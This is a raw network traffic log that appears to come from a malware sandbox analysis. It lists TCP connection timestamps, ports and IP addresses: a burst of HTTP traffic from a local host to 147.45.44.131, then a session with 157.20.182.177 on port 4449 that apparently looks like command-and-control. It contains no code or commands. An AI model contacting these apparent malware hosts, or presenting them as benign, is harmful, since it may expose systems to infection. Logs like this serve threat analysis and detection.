Jan 1, 2025 08:54:03.746059895 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.746066093 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.746068954 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.746079922 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.746089935 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.746098042 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.746098042 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.746146917 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.746737957 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.746747971 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.746757984 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.746810913 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.746869087 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.746880054 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.746958971 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.748534918 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.748543978 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.748554945 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.748588085 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.748631954 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.748693943 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.748708963 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.748847008 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.748853922 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.748857975 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.748871088 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.748881102 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.748935938 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.748935938 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.749028921 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749042034 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749052048 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749062061 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749073029 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749082088 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749093056 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749116898 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.749116898 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.749190092 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.749344110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749355078 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749365091 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749375105 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749391079 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749402046 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749408007 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.749408007 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.749416113 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749430895 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.749470949 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.749655008 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749676943 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749687910 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749697924 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749707937 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749718904 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749725103 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.749768019 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.749806881 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.749835014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749845982 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749864101 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749875069 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749885082 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749895096 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.749901056 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.750013113 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.750024080 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.750034094 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.750044107 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.750046015 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.750046015 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.750056028 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.750066996 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.750067949 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.750080109 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.750096083 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.750112057 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.750408888 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.750422001 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.750472069 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.833405018 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833420992 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833431959 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833472013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833483934 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833493948 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833508968 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.833559990 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.833585978 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833673000 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833683014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833693027 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833703995 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833713055 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833723068 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833733082 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833735943 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.833759069 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.833800077 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.833945036 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833956957 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833966970 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833977938 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833986998 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.833997011 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834005117 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.834007978 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834021091 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834037066 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.834037066 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.834088087 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.834280014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834291935 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834301949 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834346056 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.834427118 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834438086 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834455013 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834465027 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834475994 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834486008 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834501982 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834511042 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.834511995 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834511042 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.834521055 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834527016 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834599972 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.834784985 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834795952 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834876060 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.834948063 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834959030 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834968090 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834979057 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834988117 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.834999084 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835009098 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835019112 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835021019 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.835021973 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.835031986 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835043907 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835043907 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.835053921 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835069895 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.835073948 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835098982 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.835098982 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.835560083 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835572004 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835582018 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835592985 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835602999 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835618019 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835628986 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835629940 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.835629940 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.835639954 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835652113 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835663080 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835673094 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.835680962 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.835690022 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.835741043 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.836127043 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.836138964 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.836148977 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.836158991 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.836169004 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.836179972 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.836191893 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.836201906 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.836201906 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.836209059 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.836214066 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.836225033 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.836236000 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.836236954 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.836249113 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.836251974 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.836265087 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.836275101 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.836291075 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.836291075 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.836352110 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.838638067 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.838723898 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.838735104 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.838794947 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.838825941 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.838836908 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.838846922 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.838866949 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.838896990 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.838896990 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.838917971 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.838928938 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.838938951 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.838948965 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.838974953 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.838999987 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.839070082 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839081049 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839092016 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839102983 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839113951 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839123964 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839135885 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.839135885 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.839195013 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.839299917 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839310884 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839325905 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839337111 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839384079 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.839384079 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.839462996 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839473963 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839483976 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839493990 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839517117 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839528084 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839534044 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.839534044 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.839538097 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839550972 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839560986 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839561939 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.839570999 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839584112 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839603901 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.839603901 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.839677095 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.839876890 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839960098 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839970112 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839981079 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.839992046 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.840002060 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.840012074 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.840017080 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.840029955 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.840053082 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.840090990 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.840110064 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.840121984 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.840209007 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.928986073 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929002047 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929013014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929085970 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.929128885 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929140091 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929151058 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929162025 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929177999 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.929208994 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.929333925 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929343939 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929353952 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929363966 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929373980 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929384947 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929394007 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.929394960 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929405928 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929416895 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929425955 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.929464102 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.929464102 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.929792881 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929804087 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929815054 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929825068 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929835081 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929845095 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929855108 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929866076 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929877043 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929886103 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929897070 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.929900885 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.929900885 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.929917097 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.930375099 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930393934 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930403948 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930408955 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.930416107 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930425882 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930428982 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.930444956 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930455923 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930464029 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.930464983 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930478096 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930488110 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930500031 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.930502892 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930515051 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930519104 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.930526018 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930536985 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930546999 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930557966 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930568933 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930583954 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.930588007 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.930588007 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.930620909 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.931143999 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.931155920 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.931166887 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.931179047 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.931190014 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.931200981 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.931212902 CET	80	49730	147.45.44.131	192.168.2.4
Jan 1, 2025 08:54:03.931226015 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:03.972354889 CET	49730	80	192.168.2.4	147.45.44.131
Jan 1, 2025 08:54:06.389841080 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:06.394604921 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:06.394687891 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:06.402070045 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:06.406841040 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:06.996290922 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:07.003751993 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:07.008836985 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:07.175211906 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:07.228176117 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:08.857480049 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:08.862279892 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:08.862341881 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:08.867957115 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:23.773142099 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:23.778040886 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:23.779041052 CET	49731	4449	192.168.2.4	157.20.182.177
Jan 1, 2025 08:54:23.783885956 CET	4449	49731	157.20.182.177	192.168.2.4
Jan 1, 2025 08:54:24.065830946 CET	4449	49731	157.20.182.177	192.168.2.4
